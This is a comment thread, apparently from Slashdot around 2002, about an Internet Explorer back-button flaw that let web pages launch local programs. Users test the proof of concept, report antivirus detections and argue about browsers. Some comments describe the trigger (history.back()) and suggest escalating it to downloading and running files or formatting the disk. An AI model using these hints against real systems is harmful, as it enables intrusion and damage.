Ever since we have had the option I have used the built in security functions of IE. Tools/Internet Options/Security
Turn off everything for your internet zone. Add all your sites that you visit regularly to "Trusted Sites" and enable all the bells and wistles you want.
If a site breaks because they have not done simple checks to see if you have java script enabled then screw them and move on to a site that is run by someone who has an element of style and thoroughness.
Here is a wish list I do have for IE though. One power tool I have allows you to toggle images on and off with a click . I would like such a power tool that would enable/disable java script with a click and another to add trusted zones on the fly. If anyone out there has the coding capability I think you may have something.
It seems you only read the first sentence...
10 PRINT CHR$(205.5+RND(1)); : GOTO 10
Netscape 4.79 (WinNT) gives a javascript error and tries to rerun the script. Unless your a ninja with the alt+f4 and the mouse your gonna have to shut down your browser. Also the sploit works fine with IE 5.5 under NT.
We really need your help
http://www.gofundme.com/help-sherry
try the recent moz nightly builds, they are really impressive (finally)
Buffer overflows... these are implementation-specific bugs and should be easily patchable. However, MS put a lot of functionality into IE (for the most part because it's bundled) and when you look at the separate parts of all this functionality, you don't see exploitable stuff. However, combining parts of the functionality CAN LEAD to a situation that wasn't forseen, and perhaps will lead to a vulnerability.
It's easy to say "Crap!" but it takes a wicked mind to combine the right parts of the functionality of a program to create a hole, a mindset which is obviously not present under the IE designers. (but which should be though).
As a true microsoftie I more and more begin to realize that the bundling should be undone, so the set of functionality build into the webbrowser is simply focussed on what it should do: rendering pages.
Using another browser is not the answer however. The only browser that comes close to IE6 is Netscape/Mozilla, however these browsers are also packed with features you'll probably never need but CAN probably be used to create a hole when combined with other functionality in the program.
Never underestimate the relief of true separation of Religion and State.
install Windows (ouch)
run IEradicator (wonderful little IE remover available here), and make sure Outlook is gone too
install ZoneAlarm, and make sure not to give net access to any MS apps
run Opera and Eudora
enjoy! If evil bureaucrats force use of Exploder/Outlook, install them (after the forcible extraction in step 2) and use only when necessary, giving them one time access privileges only.
Access denied error message. NT 4.0 wirh service pack 6, IE 5.00.2014.0216.
Another anti-MS article brought to you by /.! Here ya go guys, have a field day!
Hotmail has had a history of session stealing by making informed guesses as to what the cookies are. With "take my cookies on back button bug," stealing sessions just got ALOT easier. The scary thing is this should effect existing sessions to more serious sites such as online trading.
I have not tested other AV products yet, but the code from the securityfocus.com page is detected as 'Exploit-CodeBase' by McAfee VirusScan 4.5.1, engine 4.1.60, DAT 4.0.4196 [10-Apr-2002], and probably earlier versions.
Your current security settings prohibit running ActiveX controls on this page. As a result, the page may not display correctly.
This is IE5, version 5.00.3103.100
Win2K pro, SP2
A few months ago I did every security update I could find on the Windows Update site (took six freaking reboots). Not sure if that helped.
In Tools -> Internet Options -> Security, I'm just set to 'medium'...
...maybe it should have worked, but it's buggy?
Duncan
I've been waiting for commercial browsers to subtly
manipulate information for quite a while.
Maybe sites served from Apache will somewhen load
0.2s slower then the ones serves from IIS.
Only on Explorer of course.
To be perfectly honest, I don't run applications that annoy me unless I absolutely have to.
Opera annoys me because it insists on trying to "be" the desktop, and opens all my browser windows inside it. That reduces the size of my browser windows, and it means I can't see the stuff behind as easily. If all it's going to do is draw background colour, then why draw it at all ?
I know some people like the way it does that, but I don't, and I'ld hazzard a guess that at least one other person agrees with me.
I normally have several browser windows open at once, and I'll switch to one that's loaded while waiting for another to load. I'll read things on the screen from other applications at the same time.. having opera try and grab all the desktop space is just too damn annoying to make me want to use it.
Half the replies are hacks to fix IE! /. readers aren't smart enough to catch on that the only fix for Exploder is to stop using it, how do we expect the hordes of clueless M$ lemmings to ever figure it out?
If
This will work on win98 boxes too - just drop the system32 and voila, minesweeper!! (or just about any other prog. that you'd like to run :)
:p
got root?
Thor Larholm released another IE universal cross-site-scripting bug today. And there are more where that came from...
Press link and then the backbutton to trigger script.
Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)
See, that's the reason I install everything under D:/WINNT. I knew this whole partition thing was invented for a reason: Increased Security!
Hans
Push 'em forward to one page, then javascript:history.back() from it - kids, don't do this at home!
Bad one, this. At least most of the IE loopholes I can avoid through settings tweaking / not surfing sites who would pull this on me. Now that *any* site can get full read/write/execute access on me with nowt but a redirect and history.back(), it's time to use Mozilla for my pr0n!
Seek and you shall find. Like all good programs, Opera gives you the opportunity to turn off this function with File -> Preferences -> Windows -> Uncheck "Open windows inside Opera workspace" and then elect to restart the browser.
IE is like that too.
In other words, most programmers are lame in their heads. But at least they get the job done. Maybe it's impossible to be anal AND productive?
Kaspersky anti virus pops up immediately and stops further execution of the javascript. you then can delete it and none of the links on the page work, so no minesweeper or google cookies for me ...
IAAL
oh yeah, M$ decided that they didnt want you to disable java script....
This
Is it just me, or is it impossible to pass arguments to the program you execute?
Starting cmd.exe is a lot more fun if you can tell it to do stuff, not just open up a window..
Indeed, isn't it the default that Opera opens each new page in a separate window (rather than as an MDI)? i.e. the poster must have actually gone and changed it at some point.
Personally I LOVE the way Opera does that (or alternately using XP and task button combining) : Maybe I'm alone in this, but there was a certain weird tension stress I'd get when my taskbar was full of 40 different windows, yet I do often treat "browsing" as one task, so merging them together works remarkable for me.
See, flash is good for something ;)
You mean Opera the spyware with built in browser ?
http://spychecker.com
nice, i hope you value your privacy as much as you value your surfing
Just in time, M$ has released a Mac UberPatch for your IE and Office. You too can have the treasured experience of "the cure is worst than the disease"!
Mod Karma -1: I sed bad wurds. If I cep my mouf shut, I wud be at riyses.
It works in IE, but not NS 4.7 or NS 6.2.... Thank god I don't use IE...
I want my rights back. I was actually using them when our government stole them after 9/11.
I've said this before, but a quick glance through the first few comments at threshold 2 didn't reveal anyone else having said it yet, so....
TURN OFF JAVASCRIPT, YOU IDIOTS!
Javascript is the Incarnation of Evil on this plane. It is the Scion of Satan. It is the Bastard of Beelzebub. Javascript blew up the Twin Towers on September 11. Javascript is what killed your goldfish when you were a kid.
(We now return you to your regularly scheduled "my browser is better than your brower" war.)
ya know, i tried to test this out. And apparently McAfee is way ahead of slashdot. It is already in there most recent virus definitions and warned me about the page (also prevented the loading of any content on the page).
:)
Glad to see that McAfee is still a quality product
This one really sucks given the plague of pop-ups out there on the web. However I couldn't get the code to work until I turned ON ActiveX... turning that off just might be the workaround until M$ decides to get around to addressing this one.
I tried the various POC HTML pieces in this thread and they all trigger my antivirus (F-secure) which sends me off to get Microsoft Security Bulletin MS01-20
This bulletin does not seem to me to have any relevance to the scripting problem we're talking about. However, the exploit does not work on my version of IE6, even if I tell F-secure to ignore the alert.
"Don't belong. Never join. Think for yourself. Peace." V.Stone, Microsoft Corporation
I'm sure that this does effect people who have no AV protection on their pc's, however, when I tried to create this code to give it a test run, my AV software told me "The file C:\Documents and Settings\NICKM\Desktop\New Text Document.txt is infected with Exploit-CodeBase Trojan." and would not allow it to run. (sorry, my work machine is XP)
I dont see this as too much of a problem
What security?
I have javascript, activex, and everything else disabled on IE 5.01.
When I visit Microsoft's web site, I get all kinds of javascript runtime errors.
WHY would errors occur if javascript isn't even running????
The best guess I could make is that js is disabled except when visiting Microsoft's web site.
If this is true, possibly a great hack would be to make IE (Ayeee!) think that it's on MS's site, and thus has full security, when the browser is actually pointing to a non-MS site.
Mozilla is also quite fast, but I like Opera much better. You don't believe me? www.opera.com :)
Dear Bill, do you have a
Thats all.. and dont say me, that I have to use cookies, etc to save current position of Flash Movie. It's annoying. :)))
so back button is evil! Looks like M$ knows that. Learn from the boss
The device you are attempting to access is either read only or just another user.
Hmm.. hit the links.. then hit back.. no programs pop up?
Who makes you Sig?
It didnt work on this NT4.0 box when I ran IE5.5. It just had a javascript:.................. url.
Which should prove that Microsoft do work on security, even if they're not making it better :)
Not Buzzword 2.0 compliant. Please speak english.
Our IT department has mandated the use of IE for all web browsing, but at least our antivirus immediately recognizes "code-exploit" when I try to run the proof-of-concept. If I exclude the proof-of-concept file, the exploit works.
How long does MS intend to ignore this? Not every antivirus program will catch this, and what about those forced to use IE for unix?
I reckon it's time to go check out F-prot for unix (I've heard they have at least a Linux port).
Ignoring hunting season, isn't carrier pigeon still the safest way to get the web for windows? Thats how I get my packets to my computer daily when I browse.
~~ Behold the flying cow with a rail gun! ~~
I just tried the exploit on IE 5.5 (running on Windows 2000). The exploits works!
Nothing like a little backward compatibility.
You can almost hear Mickey right now: "Fix it, B****!!"
IA grabed to code and through it on my apache server within the office enviroment. I went to another machine to look at teh code in IE. I tried it and got an error message (it was really long) that ended with "permision denied" It was a 98SE box. Any one else got this?
-Jeff
If you clicked the link to read the article, you can't hit the 'back' button to return to slashdot...
Denver Isuzu Suzuki
..I even USED the back button in my browser. Alt or control-left works for me! Down with mice!
;) )
(yeah, I know, same triggers.
stupid ass POS microsoft... i'm #@$*#% sick of these POS microsoft security "holes"....
add up those security holes and you have one big space
Q: Somebody cracked into my default installation of Red Hat 6.2. What do I do?
A: Install Debian.
If you can execute minesweeper, you can use ftp (the commandline client) to download something from the web without the user noticing it, you can execute it, you can use del, you may even be able to format the fucking harddrive.
Need you know more?
If you copy the html off of this site and save it while you are running a updated virus scanner like say McAffee, it will tag it as a virus and contact your admin... Not good. :-)
L053R
I quite like the proximatron -- it's shonen-ware (basically free as in beer), and quite flexible...
:wq
Netscape has had and still has tons of securty and crash bugs. Do you even read SecurityFocus? or any other security site? It's head-in-the-sand people like you that has retarded the actual improvement of Linux software by believing they are perfectly safe and therefor nothing else needs to be done. The truth is completely the opposite! One day you'll wake up. Till then I feel sorry for whoever you work for.
Did you actually look at the code? Or visit the page set up by a slashdotter to test it:t ml
http://www.eg.bucknell.edu/~ekrout/IE_Hack.h
When you hit the back button, the script is able to successfully launch an executable on my system. That means it can do almost fucking anything it wants to.
I would call that an exploit.
Another way is to never put your OS on the C:\ partition. For all of my Win2k boxes in our office, I always create several partitions on the 40GB drives that come w/our systems.
The C:\ is ususally an image that I create to restore the system in case of a meltdown :)
The OS on every workstation in our office is on the D:\ partition.
It's not a cure or anything for this stupid bug....but it does help....considering that most of these script kiddies are writing this crap to initiate files from the C:\ partition...
"Look where we worship" -- Jim Morrison
-
When lynx calls external programs for protocols (e.g. telnet), the location is passed unchecked
- CERT Advisories: Lynx security issue! (Google cache)
- Vulnerability in Lynx Downloading, Vulnerability in Lynx Temporary Files
- ...
Just search for lynx advisories/security on Goggle.dlf has spoken
Chuck was talking about data: URLs, not this IE hole.
The shareholder is always right.
That's surprising. Perhaps someone should document this phenomenon of not being able to throw huge amounts of people at a complex software project late in its development with any expectation of fixing it quickly. :P
Ya know, I think that they would have been better off if they had spent the last two months assigning everyone a book report on The Mythical Man-Month and then realizing that this change will have to be a permanent course correction instead of a short-term fix.
Best. Comment. Ever. Enjoy!
with that asinine Konqueror troll.
"If IE's Windows integration is a monopoly, then I'm all for the removal of Konqueror from KDE."
Let me assure you that the irony of you posting this drivel in a discussion thread about the latest exploit for IE has escaped no one. You are making quite the fool of yourself.
Do not spread "09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0" over the internet, thank you.
alas, there is a real exploit.
i just tried it (2Kpro/ie5.5) and:
1) clicked on the link
2) got "can't find server"
3) clicked back button
4) got some weird gibberish in the window and
5) PRESTO! got minesweeper.
there was *no* user interaction except clicking the link and then the back button. there were *no* warnings, much less dialogs with "cancel" options.
this sucks, especially since "back" would be my default response in such a situation, to check what the link was that resulted in server not found (i often do that to check if there was bad javascript or something in the link).
This Like That - fun with words!
Sigh. The response to stories like this is why I've stopped reading Slashdot for the most part. I used to read it every day, and now I go for months at a time without even looking at the front page.
Yes, there is a security problem in IE. Yes, there have been many such problems in the past. There have also been security problems with browsers for Linux. The discussion goes like this:
Linux Newbie: Microsoft should be put out of business! They don't care about security! There are hundreds of security holes in Windows and Internet Explorer!
Level-headed Computer User: But there have been security holes in Linux and software for Linux.
Linux Newbie: But Linux is a more secure operating system! You can't do as much damage under Linux because of file permissions and other security measures.
Level-headed Computer User: But we're talking about exploits. By definition an exploit is something that you were never supposed to be able to do in the first place.
Linux Newbie: Down with Microsoft! Bill Gates sucks!
I have Opera set to NOT accept pop-up windows. Blocks X10 ads (et.al.), and annoying things just like you have described. I can turn it back on anytime if I know I need a pop-up window in a trusted site.
Yet another collection of sixty-five identical comments: "A security hole in a Microsoft product? I'm shocked!"
Gee, how original. You guys must be a bunch of comic geniuses to come up with something that witty and unpredictable.
You karma whores. You've come upon a foolproof way to get scores of "5, Funny". Just write "Yeah right, as if Microsoft doesn't suck" and you'll get modded up every time. This method is so foolproof, I bet I'll get modded down just for revealing your secret.
What Would Jesus Do
(for a Klondike bar)?
I just copied the source onto my machine and tried to access it. McAffee pops up saying something along the lines of "The file that is trying to execute has a variant of the Exploit.something trojan".
.vir extension added to it. Changing the name of that file doesn't remove the .vir extension.
It then gives the option to terminate it or continue. I told it to continue since I wanted to see if patched IE 5.5 is vulnerable.
I cannot get the window to pop up again, but the scanner console says there was an infected file scanned, and every time I try to copy, rename, move, or create a file with the same contents, the file gets a
Where is your basis for this? Stating that "nobody" codes to anything greater than Java 1.1.x is so completely untrue that it is frightening someone would say it.
Java developers code to the current release which is 1.4.0. Perhaps code monkeys working in J++ only code to 1.1.x but MOST java developers code in 1.4.0 or at worst 1.3.x.
Only when you do not know your code base, and you know that people will be out there using IE do you consider "coding down" to 1.1.x. Otherwise you write to the current version and then use a script or some kind of notice to the user that they need to upgrade.
Applets will not disappear in 5 years. .NET will replace very little due to its soon to be found security bugs (prediction).
Post fact otherwise get labeled as a troll.
seSales, Point of Sale software for OS X.
In related news, Cern is reporting that "File, Open" is generally considered a huge security risk in all versions of IE.
Love many, trust a few, do harm to none.
The links assume the existance of "c:\text.txt" and "c:\winnt\winmine.exe." Change these paths to valid text files and executables on your computer. Then tell us what happens.
I tried it...
it does work when the page is on my hard drive,
but it doesn't work when I upload the page to the internet...
In other words, what the parent posted runs in the correct security zone, no problem there
http://vil.nai.com/vil/content/v_99383.htm
Virus Characteristics
This is a generic detection of malware which tries to exploit a Microsoft Internet Explorer vulnerability, which was discovered February 25, 2002. This exploit could result in an executable file being run without the users permission or knowledge, when visiting a web page or viewing HTML email message. This affects Internet Explorer 4.x and higher, Microsoft Outlook, and Microsoft Outlook Express.
This vulnerability has incorrectly been called the "Popup Object Vulnerabilty", the "Data Source Object Vulnerability", the "XMLid Exploit", or the "DynHTML Exploit" but these are just the methods to insert the exploit into the HTML. The vulnerability occurs because Internet Explorer allows HTML in the "Internet Zone" to launch programs in the "My Computer Zone".
A patch is available from Microsoft
AC 0wnz j00 biznatches!
that I use Netscape!
A slip of the foot you may soon recover, but a slip of the tongue you may never get over. -Benjamin Franklin
I don't post here much and I'm at college right now, so I can't test it on slashdot, but from posting on other sites Opera always has everything exactly the same when I hit back. I believe this is part of the design; it brings up exactly what was loaded before rather than re-loading the page like other browsers.
Personally I prefer E:\WINNT where D: is the CD-ROM. ;)
It also messes with some stuff you don't really want running.
One more degree of separation
/Users/chris/Library/Mozilla/Profiles/default/gt on n5yl.slt
I was sure that was a bug the first time I saw it.
chris@xanadu:~$ whatis /.
/.: nothing appropriate.
Microsoft Windows XS ;)
( for Xtra Secure
typical microsoft, not checking the security of simple things thta are so often used, they miss huge problems like this :(
Pi
I am just updating my system to OS X 10.1.4, which told me this about the update to IE:
"This latest version - version 5.1.4 - resolves all potential security vulnerabilities in previous versions of Internet Explorer 5. This includes vulnerabilities that might have caused Internet Explorer to stop responding or caused a memory problem that compromised the security of the computer."
It's a pretty bold statement.
All my worries about IE are gone!
After going to the trouble of loading IE and trying out the linked hack html file, I was devistated to find that my copy of winXP did not seem to have this feature built in.
Then I realized that I had proxomitron running. After bypassing it, the feature works perfectly.
Now who said having a ad filtering program running was a good thing?!?!?
I recognize the problem - will it be a +1 (Clueless/Funny) or -1 (Clueless/Wasted My Time)?
Guess I'll go with (Funny +1).
Google cookie works on Win 98 and IE 5.5 (5.50.4522.1800)but not Winmine.exe.